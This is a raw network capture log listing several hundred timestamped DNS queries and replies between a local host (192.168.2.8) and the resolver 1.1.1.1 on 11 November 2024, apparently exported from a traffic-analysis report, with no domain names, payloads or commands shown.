                                                                                                                                                                                                              Nov 11, 2024 18:33:50.601561069 CET53636171.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.602241993 CET6309753192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.603147984 CET5031853192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.611948013 CET53630971.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.613075018 CET53503181.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.622940063 CET53625271.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.623301029 CET6408453192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.623369932 CET5248553192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.623466969 CET53519901.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.623533010 CET6546853192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.623577118 CET5859753192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.623707056 CET5158653192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.624531031 CET6029653192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.624706030 CET6145453192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.624861002 CET5864353192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.624995947 CET6547853192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.625155926 CET6507253192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.625315905 CET6279553192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.625472069 CET5017853192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.625632048 CET5354053192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.625782013 CET5213853192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.625936985 CET5959853192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.626127005 CET5898053192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.632833004 CET53654781.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.633116961 CET53640841.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.633750916 CET53524851.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.633764982 CET53585971.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.634053946 CET53614541.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.634104013 CET53586431.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.634114981 CET53515861.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.635176897 CET53521381.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.635186911 CET53627951.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.635196924 CET53602961.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.636260033 CET6074353192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.636451960 CET53595981.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.636889935 CET53535401.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.637087107 CET53589801.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.641238928 CET5696953192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.642169952 CET5056553192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.642348051 CET6253753192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.643064022 CET5260653192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.647330046 CET6475353192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.647490025 CET5478853192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.647638083 CET5492553192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.648025036 CET6478553192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.650038958 CET4928153192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.652738094 CET53625371.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.654278994 CET53526061.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.654397964 CET53654681.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.656982899 CET53647531.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.657027006 CET53650721.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.657080889 CET53547881.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.658029079 CET53501781.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.658581018 CET53549251.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.667536974 CET53607431.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.667911053 CET53492811.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.672838926 CET53505651.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.672852993 CET53569691.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.679472923 CET53647851.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.848454952 CET6426553192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.859277010 CET53642651.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:51.589240074 CET5943253192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:51.621401072 CET53594321.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.579353094 CET5902853192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.586690903 CET6036353192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.595871925 CET53603631.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.596683025 CET5891453192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.606311083 CET53589141.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.607769966 CET6184453192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.608661890 CET5815753192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.613385916 CET53590281.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.616175890 CET4940053192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.617697001 CET53581571.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.618068933 CET53618441.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.625611067 CET6384353192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.634088039 CET6405453192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.634263039 CET6171553192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.644649982 CET53640541.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.647541046 CET53494001.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.651223898 CET5071353192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.656459093 CET53638431.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.661052942 CET53507131.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.665055990 CET53617151.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.677130938 CET5366353192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.709062099 CET53536631.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.718178034 CET6357653192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.748466015 CET5166853192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.751360893 CET53635761.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.758032084 CET53516681.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.766243935 CET5866353192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.767235994 CET5454553192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.767908096 CET4953753192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.770308018 CET6121653192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.770662069 CET5967353192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.772783995 CET5131153192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.776225090 CET6342553192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.777190924 CET4952153192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.778366089 CET5807353192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.779584885 CET53545451.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.780479908 CET53612161.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.780636072 CET6163453192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.780695915 CET53596731.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.784172058 CET53513111.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.786668062 CET53634251.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.788484097 CET53495211.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.797776937 CET53586631.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.798736095 CET53495371.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.800007105 CET53616341.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.803929090 CET6113253192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.804111958 CET5160253192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.804279089 CET6045953192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.804447889 CET4941753192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.804913044 CET5364753192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.805964947 CET5911753192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.806129932 CET5783253192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.809253931 CET53580731.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.813553095 CET53536471.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.814667940 CET53494171.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.814678907 CET53604591.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.816464901 CET53591171.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.817399979 CET6360953192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.821626902 CET53611321.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.825318098 CET5639353192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.826069117 CET6032753192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.826222897 CET6516553192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.826384068 CET6119153192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.826529980 CET6207053192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.826680899 CET6424653192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.826821089 CET5998453192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.826981068 CET5030353192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.827120066 CET5078353192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.827286005 CET6005253192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.827425957 CET53636091.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.827455044 CET6286853192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.828109980 CET6162053192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.828268051 CET5767353192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.828433990 CET5803253192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.830014944 CET5467353192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.830384016 CET5478653192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.831708908 CET5741353192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.834485054 CET53516021.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.835766077 CET53651651.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.835787058 CET53563931.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.836493015 CET53616201.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.836503983 CET53620701.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.836626053 CET53642461.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.837712049 CET53576731.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.838587046 CET53578321.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.838598013 CET53628681.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.842024088 CET53574131.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.848102093 CET53580321.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.853420973 CET5373253192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.857914925 CET53503031.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.857960939 CET53603271.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.858632088 CET53611911.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.858664989 CET53599841.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.859206915 CET53600521.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.859261990 CET53507831.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.861439943 CET6093253192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.861527920 CET53547861.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.861593008 CET53546731.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.861692905 CET5984953192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.863432884 CET5090453192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.863595009 CET5176253192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.864159107 CET5766753192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.864332914 CET5822153192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.864695072 CET6490253192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.864861965 CET6264353192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.868875980 CET53609321.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.871301889 CET5299753192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.872353077 CET5160453192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.872519970 CET5643953192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.872664928 CET5299053192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.872806072 CET4977053192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.872944117 CET6095153192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.873269081 CET6135853192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.873277903 CET53598491.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.873294115 CET53509041.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.873306036 CET53576671.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.873563051 CET53517621.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.873889923 CET53626431.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.875041962 CET53649021.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.881926060 CET53529971.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.881942987 CET53564391.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.882940054 CET53516041.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.883085012 CET53497701.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.884381056 CET53609511.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.884411097 CET53613581.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.885057926 CET53537321.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.896353960 CET53582211.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.903856039 CET53529901.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:55.454972982 CET6339053192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:55.466373920 CET5414053192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:55.466470957 CET6168953192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:55.473458052 CET53633901.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:55.475892067 CET53541401.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:55.479986906 CET5364153192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:55.481945038 CET4964653192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:55.489464998 CET53616891.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:55.491997957 CET53496461.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:55.499064922 CET53536411.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:55.510628939 CET5724853192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:55.511388063 CET6141553192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:55.516500950 CET5296353192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:55.518224955 CET6252753192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:55.518476963 CET5398153192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:55.521271944 CET53614151.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:55.522408009 CET53572481.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:55.527543068 CET6090553192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:55.542447090 CET5117653192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:55.545784950 CET53609051.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:55.547842026 CET53529631.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:55.550690889 CET53539811.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:55.551186085 CET53625271.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:55.552474976 CET53511761.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:55.734996080 CET5410153192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:55.738420010 CET5629253192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:55.745171070 CET6258953192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:55.746279955 CET53541011.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:55.750967026 CET5729953192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:55.761275053 CET53572991.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:55.762996912 CET53562921.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:55.773930073 CET4996553192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:55.774075985 CET5689653192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:55.787606001 CET6437153192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:55.787775040 CET6549153192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:55.801578045 CET53654911.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:55.819289923 CET53643711.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:55.963036060 CET53625891.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:55.991009951 CET53568961.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:56.022300959 CET53499651.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:56.789690971 CET5839053192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:56.789906979 CET5776753192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:56.800209045 CET53577671.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:56.804212093 CET53583901.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:57.614293098 CET6208953192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:57.625014067 CET53620891.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:57.665174961 CET5281153192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:57.665575027 CET5515753192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:57.666532993 CET6173653192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:57.666564941 CET5607153192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:57.672837973 CET53528111.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:57.676387072 CET53560711.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:57.677062035 CET53551571.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:57.696042061 CET5437653192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:57.699213982 CET53617361.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:57.708029985 CET53543761.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:57.720276117 CET5912653192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:57.919470072 CET53591261.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:59.557830095 CET5856753192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:59.589152098 CET53585671.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:59.729517937 CET5879553192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:59.739429951 CET53587951.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:02.324040890 CET5847753192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:02.335485935 CET53584771.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:02.558505058 CET4959053192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:02.571623087 CET53495901.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:02.717338085 CET6163453192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:02.727869034 CET53616341.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:03.269824982 CET6132453192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:03.280164003 CET53613241.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:03.402218103 CET5153253192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:03.435185909 CET53515321.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:03.593575001 CET5331053192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:03.603342056 CET53533101.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:03.671083927 CET6086853192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:03.715966940 CET5496953192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:03.716207981 CET5554153192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:03.721813917 CET6409853192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:03.748831034 CET5262753192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:03.752182961 CET53640981.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:03.766418934 CET5459853192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:03.766752005 CET4972653192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:03.766976118 CET5727753192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:03.776910067 CET53545981.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:03.777034998 CET53497261.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:03.780534029 CET53526271.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:03.785738945 CET53572771.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:03.874408960 CET53608681.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:03.925510883 CET6347353192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:03.928391933 CET5849153192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:03.928704977 CET6160053192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:03.933183908 CET5281153192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:03.935857058 CET53584911.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:03.937207937 CET53634731.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:03.939524889 CET53555411.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:03.943954945 CET53528111.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:03.947602987 CET5329153192.168.2.81.1.1.1
